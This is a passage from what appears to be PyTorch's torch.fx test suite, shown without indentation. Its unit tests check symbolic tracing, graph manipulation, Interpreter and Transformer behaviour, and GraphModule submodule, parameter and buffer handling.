{'foo.bar.baz': linear_mod, 'zip.zap.zam' : add_param}, graph)
gm.graph.lint()
assert 'self.foo.bar.baz' in gm.code
x : torch.Tensor = torch.rand(3, 3)
out : torch.Tensor = gm(x)
ref_out : torch.Tensor = linear_mod(x) + add_param
self.assertEqual(out, ref_out)
def test_symbolic_trace_assert(self):
class AssertsTensorShape(torch.nn.Module):
def forward(self, x):
torch._assert(x.shape[1] > 4, "assert_foobar")
return x
m = AssertsTensorShape()
# verify traceability
traced = symbolic_trace(m)
# verify assertion on traced model works correctly at runtime
traced(torch.rand(4, 5))
with self.assertRaisesRegex(AssertionError, "assert_foobar"):
traced(torch.rand(4, 3))
# verify the symbolically traced module is scriptable
ms = torch.jit.script(m)
with self.assertRaisesRegex(torch.jit.Error, "assert_foobar"):
ms(torch.rand(4, 3))
def test_trace_fn_constant(self):
some_constant = torch.rand(3, 4)
def add_const(x):
return some_constant + x
traced = symbolic_trace(add_const)
input = torch.rand(3, 4)
self.assertEqual(traced(input), add_const(input))
def test_copy_no_remap(self):
traced = symbolic_trace(SimpleTest())
g = traced.graph
copied = torch.fx.Graph()
for node in g.nodes:
copied.node_copy(node)
with self.assertRaisesRegex(RuntimeError, 'does not belong to this Graph'):
copied.lint()
def test_wrong_topo(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,))
c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
nodes = list(graph.nodes)
nodes[3].append(nodes[2])
with self.assertRaisesRegex(RuntimeError, 'was used before it has been defined'):
graph.lint()
def test_example_shape_prop(self):
class TestCase(torch.nn.Module):
def __init__(self):
super().__init__()
self.attr = torch.randn(3, 4)
self.submod = torch.nn.Linear(4, 4)
def forward(self, x):
return torch.neg(self.submod(x.relu() + self.attr))
tc = TestCase()
tc_traced = symbolic_trace(tc)
ref_out = tc_traced(torch.rand(3, 4))
shape_prop.ShapeProp(tc_traced).propagate(torch.rand(3, 4))
# Make sure we're testing all opcodes
opcodes = set()
output_shape : Optional[torch.Shape] = None
output_stride : Optional[Tuple[int]] = None
for node in tc_traced.graph.nodes:
opcodes.add(node.op)
if node.op == 'output':
output_shape = node.args[0].meta['shape']
output_stride = node.args[0].meta['stride']
self.assertEqual(opcodes, set(['placeholder', 'get_attr', 'call_function', 'call_method',
'call_module', 'output']))
# Test shape propogation and make sure results match actual
self.assertEqual(output_shape, ref_out.shape)
self.assertEqual(output_stride, ref_out.stride())
def test_interpreter(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
interpreter = Interpreter(gm)
input = torch.randn(3, 4)
self.assertEqual(interpreter.run(input), gm(input))
self.assertEqual(interpreter.run(input), m(input))
def test_interpreter_run_node_override(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
class RunNodeInterpreter(Interpreter):
def __init__(self, module):
super().__init__(module)
def run_node(self, n : Node) -> Any:
result = super().run_node(n)
n.cached_value = result
return result
input = torch.randn(3, 4)
RunNodeInterpreter(gm).run(input)
for node in gm.graph.nodes:
assert hasattr(node, 'cached_value')
def test_interpreter_onthefly_swap(self):
def fn(x):
return torch.sigmoid(x).neg()
gm = torch.fx.symbolic_trace(fn)
class NegSigmSwapInterpreter(Interpreter):
def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == torch.sigmoid:
return torch.neg(*args, **kwargs)
return super().call_function(n)
def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == 'neg':
call_self, *args_tail = args
return call_self.sigmoid(*args_tail, **kwargs)
return super().call_method(n)
input = torch.randn(3, 4)
result = NegSigmSwapInterpreter(gm).run(input)
self.assertEqual(result, torch.neg(input).sigmoid())
def test_interpreter_partial_eval(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
gm = torch.fx.symbolic_trace(MyModule())
interp = Interpreter(gm)
env = {}
for node in gm.graph.nodes:
if node.op == 'call_module' and node.target == 'linear':
env[node] = torch.arange(0, 12, 1).reshape(3, 4) - 6.0
break
assert len(env) == 1
x = torch.randn(3, 4)
result = interp.run(x, initial_env=env)
self.assertEqual(result, (torch.arange(0, 12, 1).reshape(3, 4) - 6.0).clamp(0.0, 1.0))
def test_interpreter_star_args(self):
def with_star_args(x, *args):
return x + args[0]
gm = torch.fx.symbolic_trace(with_star_args)
interp = Interpreter(gm)
result = interp.run(torch.ones(3, 4), torch.ones(3, 4), torch.rand(3, 4))
self.assertEqual(result, torch.ones(3, 4) * 2.0)
@skipIfNoTorchVision
def test_interpreter_noop_resnet18(self):
rn18 = resnet18()
transformed = torch.fx.Transformer(symbolic_trace(rn18)).transform()
inp = torch.randn(5, 3, 224, 224)
self.assertEqual(transformed(inp), rn18(inp))
@skipIfNoTorchVision
def test_interpreter_gc_values(self):
rn18 = resnet18()
interp = Interpreter(symbolic_trace(rn18))
inp = torch.rand(5, 3, 224, 224)
out = interp.run(inp)
env_key_names = set(n.name for n in interp.env.keys())
self.assertEqual(env_key_names, set(['output']))
def test_transformer_noop(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
new_gm = Transformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(new_gm(input), gm(input))
def test_transformer_op_swap(self):
def fn(x):
return torch.sigmoid(x).neg()
gm = torch.fx.symbolic_trace(fn)
class NegSigmSwapXformer(Transformer):
def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == torch.sigmoid:
return torch.neg(*args, **kwargs)
return super().call_function(n)
def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == 'neg':
call_self, *args_tail = args
return call_self.sigmoid(*args_tail, **kwargs)
return super().call_method(n)
transformed = NegSigmSwapXformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(transformed(input), torch.neg(input).sigmoid())
def test_transformer_multi_outputs(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
x = x + self.param
out = self.linear(x)
return x, out
m = MyModule()
gm = torch.fx.symbolic_trace(m)
new_gm = Transformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(new_gm(input), gm(input))
def test_fn_type_annotations(self):
class Foo(torch.nn.Module):
def forward(self, p : Pair, z : torch.Tensor, i : int) -> Dict[str, torch.Tensor]:
return {'a': p.x + p.y + z + i}
foo_scripted = torch.jit.script(Foo())
foo_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3)
fxed = symbolic_trace(Foo())
fxed_scripted = torch.jit.script(fxed)
fxed_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3)
def test_fn_type_annotation_empty(self):
def forward(a : List[torch.Tensor]):
return a[0]
torch.jit.script(symbolic_trace(forward))
def test_wrapped_method(self):
def wrap_with_relu(fn):
@functools.wraps(fn)
def wrapper(*args, **kwargs):
return torch.relu(fn(*args, **kwargs))
return wrapper
class Foo(torch.nn.Module):
@wrap_with_relu
def forward(self, x, w):
return torch.matmul(x, w)
f = Foo()
traced = symbolic_trace(f)
x, w = torch.rand(3, 4), torch.rand(4, 4)
self.assertTrue(any(n.target == torch.relu for n in traced.graph.nodes))
def test_empty_graph_codegen(self):
graph = torch.fx.Graph()
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(gm(), None)
def test_sequential(self):
m = torch.nn.Sequential(torch.nn.Conv2d(1, 1, 1))
gm = torch.fx.symbolic_trace(m)
gm_copy = copy.deepcopy(gm)
def test_ctx_mgr(self):
@contextlib.contextmanager
def do_nothing():
yield
class M(torch.nn.Module):
def __init__(self):
super().__init__()
@do_nothing()
def forward(self, x):
return torch.relu(x)
m = M()
self.checkGraphModule(m, (torch.rand(3, 4),))
def test_typename_print(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,),
type_expr=List[float])
output : torch.fx.Node = graph.output(b)
self.assertTrue('typing.List[float]' in str(graph))
def test_ellipsis(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x, y):
return x + y[:, 1:10, ...]
traced = symbolic_trace(M())
x, y = torch.rand(5, 9, 3, 4), torch.rand(5, 15, 3, 4)
self.assertEqual(traced(x, y), x + y[:, 1:10, ...])
def test_inf_nan(self):
class FooMod(torch.nn.Module):
def forward(self, x):
return x + float('inf'), x + float('-inf'), x + float('nan')
fm = FooMod()
self.checkGraphModule(fm, (torch.rand(3, 4),))
def test_inf_nan_kwds(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('inf')), {}, name='inf')
c : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('nan')), {}, name='nan')
graph.output((b, c))
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
x = torch.rand(3, 4)
self.assertEqual(gm(x), (x + float('inf'), x + float('nan')))
def test_deepcopy_recursion_depth(self):
depth = sys.getrecursionlimit() + 20
g = torch.fx.Graph()
x = g.placeholder('x')
for i in range(depth):
x = g.call_function(torch.relu, (x,))
g.output(x)
copied_graph = copy.deepcopy(g)
val_map = {}
for orig_node, new_node in zip(g.nodes, copied_graph.nodes):
val_map[orig_node] = new_node
for orig_node, new_node in zip(g.nodes, copied_graph.nodes):
orig_users = set(orig_node.users.keys())
orig_users_equiv = set(val_map[u] for u in orig_users)
new_users = set(new_node.users.keys())
self.assertEqual(orig_users_equiv, new_users)
@skipIfNoTorchVision
def test_replace_uses(self):
rn18 = resnet18()
class LowerReluTracer(torch.fx.Tracer):
def is_leaf_module(self, m : torch.nn.Module, qualname : str):
if isinstance(m, torch.nn.ReLU):
return False
return super().is_leaf_module(m, qualname)
rn18_traced = GraphModule(rn18, LowerReluTracer().trace(rn18))
to_erase = []
for node in rn18_traced.graph.nodes:
if node.op == 'call_function' and node.target in [torch.relu, torch.nn.functional.relu]:
kwargs = node.kwargs.copy()
# Neg doesn't have in-place
kwargs.pop('inplace')
with rn18_traced.graph.inserting_before(node):
new_node = rn18_traced.graph.call_function(
the_function=torch.neg, args=node.args, kwargs=node.kwargs)
node.replace_all_uses_with(replace_with=new_node)
to_erase.append(node)
for node in to_erase:
rn18_traced.graph.erase_node(node)
def test_insertion_point(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
with graph.inserting_before(b):
neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,))
_, *relu_args = b.args
b.args = (neg, *relu_args)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input = torch.randn(33, 44)
self.assertEqual(gm(input), torch.relu(torch.neg(input)))
def test_move_before(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,))
_, *relu_args = b.args
b.args = (neg, *relu_args)
b.prepend(neg)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input = torch.randn(33, 44)
self.assertEqual(gm(input), torch.relu(torch.neg(input)))
def test_erase_node_error(self):
st = SimpleTest()
traced = symbolic_trace(st)
for node in traced.graph.nodes:
# Test deleting with uses both in another Node and at the output
if node.target in [operator.add, torch.relu]:
with self.assertRaisesRegex(RuntimeError, 'but it still had .* users in the graph'):
traced.graph.erase_node(node)
def test_copy_it(self):
d = immutable_dict([(3, 4), (5, 6)])
l = immutable_list([(3, 4), (5, 6)])
self.assertEqual(d, deepcopy(d))
self.assertEqual(l, deepcopy(l))
def test_get_torch_func_signature(self):
for key in dir(torch):
obj = getattr(torch, key)
if callable(obj):
schemas = get_signature_for_torch_op(obj)
def test_find_uses(self):
graph = torch.fx.Graph()
x = torch.fx.Proxy(graph.placeholder('x'))
y = torch.relu(x)
z = x + x
u = torch.neg(x)
graph.output((y + z + u).node)
graph.lint()
users_of_x = x.node.users
self.assertEqual(len(users_of_x), 3)
expected_ops = set(['relu', 'add', 'neg'])
for use in users_of_x:
assert any(use.name.startswith(prefix) for prefix in expected_ops)
def test_inline_graph(self):
class InlineInto(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
class ToInline(torch.nn.Module):
def forward(self, x):
return torch.neg(x)
inline_into = symbolic_trace(InlineInto())
to_inline = symbolic_trace(ToInline())
combined_graph = torch.fx.Graph()
output_node = combined_graph.graph_copy(inline_into.graph, {})
input_node = list(to_inline.graph.nodes)[0]
assert input_node and input_node.op == 'placeholder'
val_map = {input_node : output_node}
output = combined_graph.graph_copy(to_inline.graph, val_map)
combined_graph.output(output)
combined_module = torch.fx.GraphModule(torch.nn.Module(), combined_graph)
input = torch.rand(3, 4)
self.assertEqual(combined_module(input), input.relu().neg())
def test_multi_insert_point(self):
graph = torch.fx.Graph()
x = torch.fx.Proxy(graph.placeholder('x'))
relu = torch.relu(x)
with graph.inserting_before(relu.node):
y = torch.neg(x)
z = torch.tanh(y)
graph.output((relu.node, z.node))
graph.lint()
expected_ops = ['x', 'neg', 'tanh', 'relu']
for node, expected in zip(graph.nodes, expected_ops):
assert expected in node.name
def test_reassign_args_kwargs_uses(self):
graph = torch.fx.Graph()
x, y = Proxy(graph.placeholder('x')), Proxy(graph.placeholder('y'))
z = x + y
zed = z + z + z
graph.output(zed.node)
graph.lint()
# zed = z + z + z -> zed = z + z + x
zed.node.args = (zed.node.args[0], x.node)
self.assertEqual(x.node.users.keys(), [z.node, zed.node])
# z = x + y -> z = y + y
z.node.args = (y.node, y.node)
self.assertEqual(x.node.users.keys(), [zed.node])
def test_trace_function(self):
def foo(x, y):
return torch.relu(x) + y
x, y = torch.randn(3, 4), torch.randn(3, 4)
self.checkGraphModule(foo, (x, y))
def test_trace_dict_int_keys(self):
class ModWithDictArg(torch.nn.Module):
def forward(self, d : Dict[int, torch.Tensor]):
return d[42]
class CallsModWithDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.m = ModWithDictArg()
def forward(self, x):
return self.m({42: x})
class MyTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return isinstance(m, ModWithDictArg)
traced_graph = MyTracer().trace(CallsModWithDict())
def test_trace_dict_proxy_keys(self):
class ModWithDictArg(torch.nn.Module):
def forward(self, d : Dict[torch.Tensor, torch.Tensor]):
return d[42]
class CallsModWithDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.m = ModWithDictArg()
def forward(self, x):
return self.m({x: x})
class MyTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return isinstance(m, ModWithDictArg)
with self.assertRaisesRegex(RuntimeError, 'cannot contain a Node'):
traced_graph = MyTracer().trace(CallsModWithDict())
def test_direct_param_use(self):
class TransposeTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.b = torch.nn.Parameter(torch.rand(4, 3))
def forward(self, x):
return self.b
class Foo(torch.nn.Module):
def __init__(self):
super().__init__()
self.a = TransposeTest()
def forward(self, x):
return self.a.b, self.a.b.t(), self.a.b.view(12)
traced = torch.fx.symbolic_trace(Foo())
assert(all('constant' not in node.target for node in traced.graph.nodes))
def test_single_default_arg(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, y=1):
return y
m = M()
self.checkGraphModule(m, ())
self.checkGraphModule(m, (3,))
def test_multiple_default_args(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, y=1, z=2):
return y + z
m = M()
self.checkGraphModule(m, ())
self.checkGraphModule(m, (3,))
self.checkGraphModule(m, (3, 4))
def test_regular_and_default_args(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x, y=1):
return x + y
m = M()
self.checkGraphModule(m, (2,))
self.checkGraphModule(m, (2, 3))
def test_string_literal_return(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self):
return "foo"
m = M()
self.checkGraphModule(m, ())
def test_namedtuple_return_qualname(self):
class NamedTupReturn(torch.nn.Module):
def forward(self, x):
return MyNamedTup(x, x)
traced = symbolic_trace(NamedTupReturn())
input = torch.rand(3, 4)
self.assertEqual(traced(input), MyNamedTup(input, input))
def test_update_args_kwargs_yells_at_you(self):
symtraced = symbolic_trace(SimpleTest())
node = next(iter(symtraced.graph.nodes))
with self.assertRaisesRegex(AttributeError, '__update_args_kwargs'):
node.__update_args_kwargs((), {})
def test_torchbind_class_attribute_in_fx(self):
if TEST_WITH_ROCM or IS_SANDCASTLE or IS_WINDOWS or IS_MACOS:
self.skipTest("torch.classes._TorchScriptTesting._StackString is registered, skipping")
class FooBar1234(torch.nn.Module):
def __init__(self):
super(FooBar1234, self).__init__()
self.f = torch.classes._TorchScriptTesting._StackString(["3", "4"])
def forward(self):
return self.f.top()
m = FooBar1234()
self.checkGraphModule(m, ())
def test_torchbind_class_attribute_in_fx_tensor_arg(self):
if TEST_WITH_ROCM or IS_SANDCASTLE or IS_WINDOWS or IS_MACOS:
self.skipTest("torch.classes._TorchScriptTesting._ReLUClass is registered, skipping")
class FooBar2341(torch.nn.Module):
def __init__(self):
super(FooBar2341, self).__init__()
self.f = torch.classes._TorchScriptTesting._ReLUClass()
def forward(self, x):
return self.f.run(x)
m = FooBar2341()
traced = symbolic_trace(m)
input = torch.randn(3, 4)
self.assertEqual(traced(input), m(input))
self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes))
def test_script_method_trace(self):
class Scripted(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
class Holder(torch.nn.Module):
def __init__(self):
super().__init__()
self.s = torch.jit.script(Scripted())
def forward(self, x):
return self.s(x)
h = Holder()
traced = symbolic_trace(h)
input = torch.randn(3, 4)
self.assertEqual(traced(input), h(input))
self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes))
def test_namedtuple_return_trace(self):
class NamedTupReturn(torch.nn.Module):
def forward(self, x):
return Pair(x, x)
traced = symbolic_trace(NamedTupReturn())
input = torch.rand(3, 4)
self.assertEqual(traced(input), Pair(input, input))
def test_return_type_exists(self):
class ReturnTypeModule(torch.nn.Module):
def other(self, x: List[str]) -> List[str]:
return x
def forward(self, x: List[str]) -> List[str]:
return self.other(x)
traced = symbolic_trace(ReturnTypeModule())
self.assertIn("-> typing_List[str]", traced._code)
scripted = torch.jit.script(traced)
self.assertIn("-> List[str]", scripted.code)
def getitem_inner(self):
class GetItemBase(torch.nn.Module):
def __init__(self):
super().__init__()
self.register_buffer('pe', torch.randn(8, 8))
class GetItem1(GetItemBase):
def forward(self, x):
return self.pe[:, :x.size(0)]
class GetItem2(GetItemBase):
def forward(self, x):
return self.pe[x.size(0)]
class GetItem3(GetItemBase):
def forward(self, x):
return self.pe[4] # fx creates `self._tensor_constant0` here
self.checkGraphModule(GetItem1(), [torch.zeros(4)])
self.checkGraphModule(GetItem2(), [torch.zeros(4)])
self.checkGraphModule(GetItem3(), [torch.zeros(4)])
@unittest.skipUnless(os.environ.get("FX_PATCH_GETITEM") == "1",
"Will be checked in test_getitem_subproc")
def test_getitem(self):
self.getitem_inner()
def test_getitem_subproc(self):
# need to run this test in a subproc to work around:
# https://github.com/pytorch/pytorch/issues/50710
proc = Process(target=run_getitem_target)
proc.start()
proc.join()
self.assertEqual(proc.exitcode, 0)
def test_user_friendly_call_provenance_with_function(self):
def fn(x):
return wrapper_fn(x)
traced = torch.fx.symbolic_trace(fn)
with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is "
"being compiled since it was called"
" from 'fn.forward'"):
scripted = torch.jit.script(traced)
def test_user_friendly_call_provenance_with_module(self):
class M(torch.nn.Module):
def forward(self, x):
return wrapper_fn(x)
traced = torch.fx.symbolic_trace(M())
with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is "
"being compiled since it was called"
" from 'M.forward'"):
scripted = torch.jit.script(traced)
def test_snake_case(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.activations = torch.nn.ModuleDict([
["snake_case", torch.nn.ReLU()],
["PascalCase", torch.nn.LeakyReLU()],
["ALL_CAPS", torch.nn.PReLU()]
])
def forward(self, x):
a = self.activations["snake_case"](x)
b = self.activations["PascalCase"](x)
c = self.activations["ALL_CAPS"](x)
return a, b, c
traced = symbolic_trace(M())
check = [
("activations_snake_case", "activations.snake_case"),
("activations_pascal_case", "activations.PascalCase"),
("activations_all_caps", "activations.ALL_CAPS")
]
i = 0
for node in traced.graph.nodes:
if node.op == "placeholder" or node.op == "output":
continue
name = check[i][0]
target = check[i][1]
self.assertEqual(name, node.name)
self.assertEqual(target, node.target)
i += 1
self.assertEqual(i, 3)
def test_no_mutation(self):
from torch.fx.immutable_collections import immutable_list
x = immutable_list([3, 4])
with self.assertRaisesRegex(NotImplementedError, "new_args"):
x[0] = 4
def test_partial_trace(self):
class Foo(torch.nn.Module):
def forward(self, x, y):
if y:
return 2 * x
else:
return x
mod = Foo()
mod_true = symbolic_trace(mod, concrete_args={'y': True})
mod_false = symbolic_trace(mod, concrete_args={'y': False})
self.assertEqual(mod_true(3), 6)
self.assertEqual(mod_false(3), 3)
def test_custom_traceback_raised_when_exception_source_is_graphmodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.W = torch.nn.Parameter(torch.randn(5))
def forward(self, x):
return torch.dot(self.W, x)
traced = torch.fx.symbolic_trace(M())
out = [n for n in traced.graph.nodes if n.op == "output"][-1]
with traced.graph.inserting_before(out):
relu_out = traced.graph.call_method(method_name='relu',
args=(out.args[0],))
out.args = (relu_out,)
traced.recompile()
with self.capture_stderr() as captured:
with self.assertRaises(TypeError):
traced(5)
self.assertIn("Call using an FX-traced Module, line 4 of the "
"traced Module’s generated forward function:",
captured[0])
def test_custom_traceback_not_raised_when_exception_source_is_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.linear = torch.nn.Linear(3, 4)
def forward(self, x):
return self.linear(x)
traced = torch.fx.symbolic_trace(M())
# Do not change this to `capture_stderr` or another context
# manager without ensuring that the output is as expected
try:
traced(torch.rand(5, 5))
except RuntimeError:
captured = traceback.format_exc()
self.assertNotIn("Call using an FX-traced Module, line 4 of the"
" traced Module’s generated forward function:",
captured)
def test_ast_rewriter_rewrites_assert(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, y: int, z: int):
assert y == z
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_ast_rewriter_rewrites_assert_with_message(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, y: int, z: int):
assert y == z, "msg"
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_ast_rewriter_reassigns_submodules(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.bn = torch.nn.BatchNorm2d(100)
def forward(self, x: torch.Tensor):
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_submodule_manipulation_API(self):
class C(torch.nn.Module):
def __init__(self):
super(C, self).__init__()
self.conv = torch.nn.Conv2d(16, 33, 3, stride=2)
self.param = torch.nn.Parameter(torch.rand(2, 3))
def forward(self, x):
return self.conv(torch.cat([self.param, x]))
class B(torch.nn.Module):
def __init__(self):
super(B, self).__init__()
self.linear = torch.nn.Linear(100, 200)
self.register_buffer("buf", torch.randn(2, 3))
self.net_c = C()
def forward(self, x):
return self.linear(torch.cat([self.buf, self.net_c(x)]))
class A(torch.nn.Module):
def __init__(self):
super(A, self).__init__()
self.net_b = B()
self.param = torch.nn.Parameter(torch.rand(2, 3))
def forward(self, x):
return self.net_b(x) + self.param
a = symbolic_trace(A())
a.add_submodule("net_b.net_c.dropout", torch.nn.Dropout(p=0.2))
conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"][-1]
with a.graph.inserting_before(conv):
dropout = a.graph.call_module(module_name="net_b.net_c.dropout",
args=conv.args)
conv.replace_all_uses_with(dropout)
a.graph.erase_node(conv)
a.recompile()
def module_exists(gm: GraphModule, path: str) -> bool:
return any(path == name for name, _ in gm.named_modules())
def parameter_exists(gm: GraphModule, path: str) -> bool:
return (any(path == name for name, _ in gm.named_parameters())
and any(path == name for name in gm.state_dict().keys()))
def buffer_exists(gm: GraphModule, path: str) -> bool:
return (any(path == name for name, _ in gm.named_buffers())
and any(path == name for name in gm.state_dict().keys()))
# Test that we added the "dropout" submodule
self.assertTrue(module_exists(a, "net_b.net_c.dropout"))
# Test `get_submodule` with an added submodule
self.assertIsNotNone(a.get_submodule("net_b.net_c.dropout"))
# Test that the "conv" submodule is still there
self.assertTrue(module_exists(a, "net_b.net_c.conv"))
# Test `get_submodule` with an original module
self.assertIsNotNone(a.get_submodule("net_b.net_c.conv"))
# Test that the "conv" node is NOT still there
conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"]
self.assertEqual(conv, [])
a.delete_submodule("net_b.net_c.conv")
# Test that the "conv" submodule is now gone
self.assertFalse(module_exists(a, "net_b.net_c.conv"))
# Test `get_submodule` with a deleted submodule
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`conv`"):
self.assertIsNone(a.get_submodule("net_b.net_c.conv"))
# Test `get_attr` warnings
cat = [n for n in a.graph.nodes if n.target == torch.cat][-1]
with a.graph.inserting_before(cat):
with warnings.catch_warnings(record=True) as w:
param = a.graph.get_attr(qualified_name="net_b.net_c.param")
self.assertEqual(len(w), 0)
with self.assertWarnsRegex(UserWarning, "Attempted to "
"insert a get_attr Node with no "
"underlying reference in the "
"owning GraphModule"):
bad_param = a.graph.get_attr(qualified_name="net_b.param")
a.graph.erase_node(bad_param)
cat.args = (*cat.args, param)
a.recompile()
a.graph.lint()
# Test `get_parameter`
a.get_parameter("net_b.net_c.param")
with self.assertRaisesRegex(AttributeError, "is not an "
"nn.Parameter"):
a.get_parameter("net_b.buf")
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`param`"):
a.get_parameter("net_b.param")
# Test `get_buffer`
a.get_buffer("net_b.buf")
with self.assertRaisesRegex(AttributeError, "is not a "
"buffer"):
a.get_buffer("net_b.net_c.param")
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`buf`"):
a.get_buffer("net_b.net_c.buf")
# Test non-nested attributes
a.get_submodule("")
a.get_parameter("param")
# Insert some unused submodules
a.add_submodule("net_b.embedding", torch.nn.Embedding(10, 3))
a.add_submodule("net_b.net_c.embedding", torch.nn.Embedding(10, 3))
a.add_submodule("net_b.net_c.rnn", torch.nn.RNN(10, 20, 2))
a.add_submodule("batch_norm_2d", torch.nn.BatchNorm2d(100))
# Garbage collection
a.delete_all_unused_submodules()
# Test that all the unused submodules are gone
self.assertFalse(module_exists(a, "net_b.embedding"))
self.assertFalse(module_exists(a, "net_b.net_c.embedding"))
self.assertFalse(module_exists(a, "net_b.net_c.rnn"))
self.assertFalse(module_exists(a, "batch_norm_2d"))
# Test that we didn't delete any unused Parameters or buffers
self.assertTrue(parameter_exists(a, "net_b.net_c.param"))
self.assertTrue(buffer_exists(a, "net_b.buf"))
a.graph.lint()
def _test_graph_module_init_buffer_param_copied(self, use_dict_init: bool):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.register_buffer("my_buff", torch.rand(3, 4))
self.register_parameter(
"my_param", torch.nn.Parameter(torch.rand(3, 4))
)
def forward(self, x):
return x + self.my_buff + self.my_param
mod = MyModule()
mod_traced = symbolic_trace(mod)
# Create new GraphModule based on original, either w/ dict or root module.
orig_buff = mod_traced.get_buffer("my_buff")
orig_param = mod_traced.get_parameter("my_param")
mod_traced_new = GraphModule(
{"my_buff": orig_buff, "my_param": orig_param} if use_dict_init else mod,
mod_traced.graph,
)
# Check that both my_buff and my_param are found and the same.
try:
new_buff = mod_traced_new.get_buffer("my_buff")
except Exception:
self.fail("Did not find my_buff")
self.assertEqual(orig_buff, new_buff)
try:
new_param = mod_traced_new.get_parameter("my_param")
except Exception:
self.fail("Did not find my_param")
self.assertEqual(orig_param, new_param)
x = torch.rand(3, 4)
orig_out = mod_traced(x)
submodules_out = mod_traced_new(x)
self.assertEqual(orig_out, submodules_out)
def test_graph_module_init_buffer_param_copied_dict_init(self):
self._test_graph_module_init_buffer_param_copied(use_dict_init=True)
